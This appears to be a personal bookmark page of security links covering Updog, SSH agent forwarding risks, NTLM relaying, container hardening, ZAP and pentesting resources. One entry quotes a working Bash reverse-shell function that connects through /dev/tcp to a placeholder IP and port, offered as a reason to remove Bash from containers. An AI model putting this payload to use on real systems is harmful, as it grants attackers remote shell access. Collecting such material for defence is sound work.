101 private links
Updog is a replacement for Python's SimpleHTTPServer. It allows uploading and downloading via HTTP/S, can set ad hoc SSL certificates and use http basic auth. - GitHub - sc0tfree/updog: Updog is a replacement for Python's SimpleHTTPServer. It allows uploading and downloading via HTTP/S, can set ad hoc SSL certificates and use http basic auth.
Using SSH agent forwarding is dangerous. However, a dedicated agent can mitigate the risks.
Important for HCL Connections Automation! The global UseAgentForward needs more documentation and anrework to avoid.
NTLM relaying for Windows made easy. Contribute to CCob/lsarelayx development by creating an account on GitHub.
A simple Bash reverse shell like this one is a good reason to remove Bash from your containers. It uses Bash’s virtual /dev/tcp/ filesystem, and is not exploitable in sh, which doesn’t include this oft-abused feature:
revshell() {
local TARGET_IP="${1:-123.123.123.123}";
local TARGET_PORT="${2:-1234}";
while :; do
nohup bash -i &> \
/dev/tcp/${TARGET_IP}/${TARGET_PORT} 0>&1;
sleep 1;
done
}
While Kubernetes has many advantages, it also brings new security challenges.
Securing applications is not the easiest thing to do. An application has many components: server-side logic, client-side logic, data storage, data transportation, API, and more. With all these…
How to configure your browser to block web fonts to speed up your web browsing and protect your privacy.
Vulnerable by design
Container outbreaks and other security related things
ZAP 2.10.0 Anniversary Release
Again a great collection of things worth reading all around bug bounty and pentesting.
A curated list of Android Security materials and resources For Pentesters and Bug Hunters.
When we browse any application that application server fetch data such as images, web pages from different locations on the same server or maybe from a different server on the internet. So to make…
Container security is a broad problem space and there are many low hanging fruits one can harvest to mitigate risks. A good starting point is to follow some rules when writing Dockerfiles.